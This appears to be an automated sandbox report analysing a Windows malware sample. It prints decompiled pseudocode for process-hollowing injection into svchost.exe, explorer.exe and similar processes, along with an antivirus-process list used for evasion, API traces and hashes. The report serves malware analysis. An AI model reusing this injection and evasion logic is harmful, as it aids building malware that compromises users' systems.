                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406B91
                                                                                                                                            • Part of subcall function 00407EF0: Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                                                            • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F48
                                                                                                                                            • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F6D
                                                                                                                                            • Part of subcall function 00407EF0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                                                            • Part of subcall function 00407EF0: CloseHandle.KERNEL32(00000000,00000001,?), ref: 00407F86
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406C7E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 00406C8D
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,74B5F7F0,00000000), ref: 00406C92
                                                                                                                                            • Part of subcall function 00407EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close$HandleProcess32$CreateNextProcess$AttributesChangeCurrentFileFindFirstNotificationSnapshotToolhelp32
                                                                                                                                          • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                                                          • API String ID: 784547097-1880040858
                                                                                                                                          • Opcode ID: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                                                          • Instruction ID: e8651156ccd0aa44593a489e188d373cfd9c837c14a664b72568e472e4b0eebb
                                                                                                                                          • Opcode Fuzzy Hash: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                                                          • Instruction Fuzzy Hash: 97512071D4030565FB209A519D47FAB727D5B00788F14007BB905B11C2FBBDBE54866E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00405E60, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 300sleepprocessmemoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                          			E00405E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E00401BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E00401CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E00401E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E00401670( &_v132, 0, 0x44);
						E00401670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??); // executed
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E004061F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372); // executed
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E00406250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24); // executed
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E004072C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E004074D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E004073C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E004074D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E00407230(0, _t176, _v36,  &_v1372) == 0 || E004071A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388); // executed
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4); // executed
															_v24 = _t132;
															if(_t132 != 0) {
																E00401BB0(_t132, 0, 0x138);
																E004074D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000); // executed
															}
															FindCloseChangeNotification(_v36); // executed
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E004074D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E00406300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E004073C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E00407120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}



















































                                                                                                                                          0x00405e60
                                                                                                                                          0x00405e60
                                                                                                                                          0x00405e61
                                                                                                                                          0x00405e70
                                                                                                                                          0x00405e8c
                                                                                                                                          0x00405e91
                                                                                                                                          0x00405e99
                                                                                                                                          0x00405e9c
                                                                                                                                          0x00405ea6
                                                                                                                                          0x00405ea9
                                                                                                                                          0x00405eae
                                                                                                                                          0x00405eb1
                                                                                                                                          0x00405ebe
                                                                                                                                          0x00405ec3
                                                                                                                                          0x00405ec3
                                                                                                                                          0x00405ecb
                                                                                                                                          0x00405ed2
                                                                                                                                          0x00405ed5
                                                                                                                                          0x00405ed8
                                                                                                                                          0x00405edb
                                                                                                                                          0x00405edd
                                                                                                                                          0x004061de
                                                                                                                                          0x004061df
                                                                                                                                          0x004061e8
                                                                                                                                          0x00405eec
                                                                                                                                          0x00405eef
                                                                                                                                          0x00405ef7
                                                                                                                                          0x00000000
                                                                                                                                          0x00405efd
                                                                                                                                          0x00405f05
                                                                                                                                          0x00405f12
                                                                                                                                          0x00405f17
                                                                                                                                          0x00405f1a
                                                                                                                                          0x00405f2b
                                                                                                                                          0x00405f2f
                                                                                                                                          0x00405f30
                                                                                                                                          0x00405f32
                                                                                                                                          0x00405f34
                                                                                                                                          0x00405f3d
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f36
                                                                                                                                          0x00405f4a
                                                                                                                                          0x00405f50
                                                                                                                                          0x00405f52
                                                                                                                                          0x00000000
                                                                                                                                          0x00405f58
                                                                                                                                          0x00405f68
                                                                                                                                          0x00405f6d
                                                                                                                                          0x00405f70
                                                                                                                                          0x00405f72
                                                                                                                                          0x004061c3
                                                                                                                                          0x004061c8
                                                                                                                                          0x004061d7
                                                                                                                                          0x004061dc
                                                                                                                                          0x00000000
                                                                                                                                          0x00405f78
                                                                                                                                          0x00405f91
                                                                                                                                          0x00405f9f
                                                                                                                                          0x00405fa4
                                                                                                                                          0x00405fa9
                                                                                                                                          0x00000000
                                                                                                                                          0x00405faf
                                                                                                                                          0x00405faf
                                                                                                                                          0x00405fb2
                                                                                                                                          0x00405fb5
                                                                                                                                          0x00405fb8
                                                                                                                                          0x00405fbb
                                                                                                                                          0x00405fbd
                                                                                                                                          0x00405ff9
                                                                                                                                          0x0040600c
                                                                                                                                          0x00406013
                                                                                                                                          0x00406018
                                                                                                                                          0x0040601b
                                                                                                                                          0x00000000
                                                                                                                                          0x0040603b
                                                                                                                                          0x0040603b
                                                                                                                                          0x00406055
                                                                                                                                          0x00000000
                                                                                                                                          0x0040605b
                                                                                                                                          0x0040605b
                                                                                                                                          0x00406061
                                                                                                                                          0x0040606c
                                                                                                                                          0x004060e2
                                                                                                                                          0x004060fb
                                                                                                                                          0x0040610a
                                                                                                                                          0x00000000
                                                                                                                                          0x00406110
                                                                                                                                          0x00406115
                                                                                                                                          0x0040611a
                                                                                                                                          0x0040612a
                                                                                                                                          0x0040612c
                                                                                                                                          0x00406139
                                                                                                                                          0x00000000
                                                                                                                                          0x0040614b
                                                                                                                                          0x00406150
                                                                                                                                          0x00406164
                                                                                                                                          0x0040616a
                                                                                                                                          0x0040616f
                                                                                                                                          0x00406179
                                                                                                                                          0x00406192
                                                                                                                                          0x004061a1
                                                                                                                                          0x004061a1
                                                                                                                                          0x004061b0
                                                                                                                                          0x004061b5
                                                                                                                                          0x004061c2
                                                                                                                                          0x004061c2
                                                                                                                                          0x00406139
                                                                                                                                          0x0040606e
                                                                                                                                          0x00406071
                                                                                                                                          0x00406073
                                                                                                                                          0x00406088
                                                                                                                                          0x00406097
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004060a0
                                                                                                                                          0x004060a5
                                                                                                                                          0x004060b8
                                                                                                                                          0x004060c7
                                                                                                                                          0x00000000
                                                                                                                                          0x004060cd
                                                                                                                                          0x004060d0
                                                                                                                                          0x004060d7
                                                                                                                                          0x004060d8
                                                                                                                                          0x004060dd
                                                                                                                                          0x00000000
                                                                                                                                          0x004060df
                                                                                                                                          0x004060df
                                                                                                                                          0x00000000
                                                                                                                                          0x004060df
                                                                                                                                          0x004060dd
                                                                                                                                          0x00000000
                                                                                                                                          0x004060c7
                                                                                                                                          0x00000000
                                                                                                                                          0x00406073
                                                                                                                                          0x0040606c
                                                                                                                                          0x00406055
                                                                                                                                          0x00405fbf
                                                                                                                                          0x00405fbf
                                                                                                                                          0x00405fc2
                                                                                                                                          0x00405fce
                                                                                                                                          0x00405fd3
                                                                                                                                          0x00405fd6
                                                                                                                                          0x00405fd9
                                                                                                                                          0x00405fdc
                                                                                                                                          0x00405fde
                                                                                                                                          0x00000000
                                                                                                                                          0x00405fe7
                                                                                                                                          0x00405fec
                                                                                                                                          0x00405ff1
                                                                                                                                          0x00405ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405ff3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405fc2
                                                                                                                                          0x00405fbd
                                                                                                                                          0x00405fa9
                                                                                                                                          0x00405f72
                                                                                                                                          0x00405f52
                                                                                                                                          0x00405ef7
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
                                                                                                                                          • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B0
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5
                                                                                                                                            • Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF
                                                                                                                                            • Part of subcall function 004073C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 00407429
                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061D7
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061DC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseProcess$Handle$CurrentVirtual$AllocChangeCreateFindFreeNotificationSleepTerminate
                                                                                                                                          • String ID: 0125789244697858$ntdll.dll$I@
                                                                                                                                          • API String ID: 3897173628-1460664302
                                                                                                                                          • Opcode ID: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                                                          • Instruction ID: 1d2188587597bc53f96400c66c54050a6bc471ffeb9cfe25592a30c854cca956
                                                                                                                                          • Opcode Fuzzy Hash: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                                                          • Instruction Fuzzy Hash: E9B18071D00209BBEF109B95CD41FAEBBB9FF04304F14406AFA05B62D1E779A960DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00407FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                          			E00407FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_t17 =  *_t11(_a8, 0, 0,  &_v8); // executed
						if(_t17 != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E00401A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}








                                                                                                                                          0x00407fb0
                                                                                                                                          0x00407fb4
                                                                                                                                          0x0040802f
                                                                                                                                          0x00408035
                                                                                                                                          0x00407fb6
                                                                                                                                          0x00407fbc
                                                                                                                                          0x00407fc4
                                                                                                                                          0x0040800c
                                                                                                                                          0x00408014
                                                                                                                                          0x00000000
                                                                                                                                          0x00408016
                                                                                                                                          0x00408016
                                                                                                                                          0x00408019
                                                                                                                                          0x0040801b
                                                                                                                                          0x0040801d
                                                                                                                                          0x00408020
                                                                                                                                          0x00408026
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00408026
                                                                                                                                          0x00407fc6
                                                                                                                                          0x00407fc9
                                                                                                                                          0x00407fd8
                                                                                                                                          0x00407fdc
                                                                                                                                          0x00408028
                                                                                                                                          0x00408029
                                                                                                                                          0x00000000
                                                                                                                                          0x00407fde
                                                                                                                                          0x00407fe4
                                                                                                                                          0x00407fef
                                                                                                                                          0x00407ff5
                                                                                                                                          0x00407ff6
                                                                                                                                          0x00408005
                                                                                                                                          0x00408005
                                                                                                                                          0x00407fdc
                                                                                                                                          0x00407fc4

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                                                          • CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040800C
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00408029
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                                                          • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                                                          • API String ID: 2437428030-337183102
                                                                                                                                          • Opcode ID: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                                                          • Instruction ID: 5a5f59212e9234ed04b8ab6130e8ec1b5f2c4e940e4abc4082f6536912f10ee2
                                                                                                                                          • Opcode Fuzzy Hash: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                                                          • Instruction Fuzzy Hash: 6901F531640205BBDB215F60DE0AB9E3BA8EF08741F104035FD04B41E1EFB9DE249A9D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00403150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t11;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x5d1314 == 0) {
					if( *0x5d1318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x5d1318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E00401A00(_a4,  &_v524);
					E00401970(_a4, _t17);
					_t11 = E00407ED0(_t20); // executed
					if(_t11 != 0) {
						L11:
						return 1;
					} else {
						E00401A00(_t20,  &_v524);
						E00401970(_t20, _t18);
						_t16 = E00407ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}









                                                                                                                                          0x00403162
                                                                                                                                          0x00403180
                                                                                                                                          0x0040318e
                                                                                                                                          0x00403193
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00403164
                                                                                                                                          0x0040316b
                                                                                                                                          0x00403182
                                                                                                                                          0x00403182
                                                                                                                                          0x00403187
                                                                                                                                          0x0040316d
                                                                                                                                          0x0040316d
                                                                                                                                          0x00403172
                                                                                                                                          0x00403172
                                                                                                                                          0x0040316b
                                                                                                                                          0x004031a4
                                                                                                                                          0x004031ac
                                                                                                                                          0x00403215
                                                                                                                                          0x004031b5
                                                                                                                                          0x004031b6
                                                                                                                                          0x004031c1
                                                                                                                                          0x004031c8
                                                                                                                                          0x004031ce
                                                                                                                                          0x004031d8
                                                                                                                                          0x00403202
                                                                                                                                          0x0040320d
                                                                                                                                          0x004031da
                                                                                                                                          0x004031e2
                                                                                                                                          0x004031e9
                                                                                                                                          0x004031ef
                                                                                                                                          0x004031f9
                                                                                                                                          0x00000000
                                                                                                                                          0x004031fb
                                                                                                                                          0x00403201
                                                                                                                                          0x00403201
                                                                                                                                          0x004031f9
                                                                                                                                          0x004031d8

                                                                                                                                          APIs
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,74B04D40,00000000), ref: 004031A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryWindows
                                                                                                                                          • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                                                          • API String ID: 3619848164-3654143111
                                                                                                                                          • Opcode ID: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                                                          • Instruction ID: 5271e3ad36bb831133aa074bfbbea18cf9a940d0c74e058bf0f41e493ec8db13
                                                                                                                                          • Opcode Fuzzy Hash: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                                                          • Instruction Fuzzy Hash: 8B112B71A0220467D7206A15AC45BAB775CCB0535AF1405BBFD08F62E3D73E9F8582DE
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00404DE0, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 152sleepCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E00404DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E00401670( &_v3276, 0, 0xcc8);
				_t41 =  *0x5d1bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x5d1bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x5d1c24; // 0x0
				_v1788 = _t43;
				_t44 = E00404B00(_t79, __edx, _t93, _a4); // executed
				_t84 = _t44;
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E004028F0(_t84, E00405000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E00401510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E004017E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E004017E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E004017E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E004017E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x5d1c28;
								if( *0x5d1c28 != 0) {
									_t62 = E00401740("9dbcf183762872d8917b8a19535a0c65",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										_t23 =  &_a20; // 0x404a7a
										E004076A0(_t79, _t80, _t82, _a16,  *_t23,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E004017E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E004017E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E00401510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E00404B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E004017B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E00404B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E00404B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}































                                                                                                                                          0x00404de0
                                                                                                                                          0x00404de0
                                                                                                                                          0x00404de0
                                                                                                                                          0x00404df9
                                                                                                                                          0x00404dfe
                                                                                                                                          0x00404e03
                                                                                                                                          0x00404e06
                                                                                                                                          0x00404e0c
                                                                                                                                          0x00404e11
                                                                                                                                          0x00404e17
                                                                                                                                          0x00404e1d
                                                                                                                                          0x00404e23
                                                                                                                                          0x00404e28
                                                                                                                                          0x00404e2a
                                                                                                                                          0x00404e2d
                                                                                                                                          0x00404e2f
                                                                                                                                          0x00404e8d
                                                                                                                                          0x00404e9a
                                                                                                                                          0x00404e9f
                                                                                                                                          0x00404ea2
                                                                                                                                          0x00404ea5
